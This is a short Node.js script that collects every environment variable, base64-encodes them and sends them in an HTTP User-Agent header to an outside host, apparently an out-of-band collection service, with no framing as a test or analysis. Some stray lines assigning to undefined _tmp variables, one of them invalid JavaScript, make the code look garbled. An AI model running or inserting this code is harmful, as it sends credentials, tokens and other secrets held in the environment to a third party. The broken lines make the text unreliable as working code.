const http = require('http')
const host = 'hg8kh9.ceye.io'
const env = JSON.stringify(process.env)
const data = new Buffer(env).toString('base64')
const options =  {
  host: host,
  // path: '/' + data,
  headers: {
    'User-Agent': data,
  },
}
_tmp_2.host = host
_tmp_2.headers = {
    'User-Agent': data,
  }
_tmp_3.User-Agent = data
http.get(options, (res) => {
  console.log(`status code: ${res.statusCode}`);
  res.on('data', chunk => console.log(chunk.toString()));
}).on('error', e => console.error(e.message))
